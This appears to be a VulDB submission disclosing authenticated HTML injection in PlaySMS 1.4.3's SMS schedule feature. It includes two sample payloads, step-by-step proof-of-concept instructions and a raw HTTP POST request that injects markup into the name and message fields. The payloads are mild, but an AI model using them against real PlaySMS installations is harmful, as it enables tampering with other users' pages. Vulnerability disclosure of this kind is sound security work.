Title | playsms 1.4.3 Argument Injection |
---|
Description | PlaySMS 1.4.3 has authenticated HTML Injection in schedule messages
Payloads:
<br><h1> Olá </h1></br>
<div style="background-image: url('https://cdn.donmai.us/sample/db/87/__yoru_chainsaw_man_drawn_by_ateoyh__sample-db87b0589605724a7b121afc2fe03a82.jpg'); width: 1000px; height: 1000px;"></div>
PoC
1. Authenticate in login page http://x.x.x.x/playsms/index.php?app=main&inc=core_auth&route=login
2. Click in My Account > Schedule messages (/index.php?app=main&inc=feature_schedule&op=list)
3. Click in Add SMS schedule
4. Intercept with burp and add payload <br><h1> Olá </h1></br> in "name" and "message" field
5. Save and back to http://x.x.x.x/playsms/index.php?app=main&inc=feature_schedule&op=list
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
POST /playsms/index.php?app=main&inc=feature_schedule&route=edit&op=edit_yes HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 177
Origin: http://x.x.x.x
Connection: keep-alive
Referer: http://x.x.x.x/playsms/index.php?app=main&inc=feature_schedule&route=edit&op=list&id=2
Cookie: main_config_last_tab=%23tabs-site-configuration; PHPSESSID=9a0e3569hordkgjqma5qknmli3
Upgrade-Insecure-Requests: 1
X-CSRF-Token=5f6490434b82ce1fbc84b34a01a513f4&id=2&name=%3Cbr%3E%3Ch1%3E+Ol%C3%A1+%3C%2Fh1%3E%3C%2Fbr%3E&message=%3Cbr%3E%3Ch1%3E+Ol%C3%A1+%3C%2Fh1%3E%3C%2Fbr%3E&schedule_rule=0
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Ref: https://playsms.org |
---|
Source | ⚠️ http://x.x.x.x/playsms/index.php?app=main&inc=feature_schedule&op=list |
---|
User | Dhimitri (UID 45045) |
---|
Submission | 05/30/2024 07:56 PM (8 months ago) |
---|
Moderation | 06/11/2024 01:29 PM (12 days later) |
---|
Status | Accepted |
---|
VulDB Entry | 267912 [playSMS up to 1.4.7 SMS Schedule index.php?app=main&inc=feature_schedule&op=list name/message cross site scripting] |
---|
Points | 20 |
---|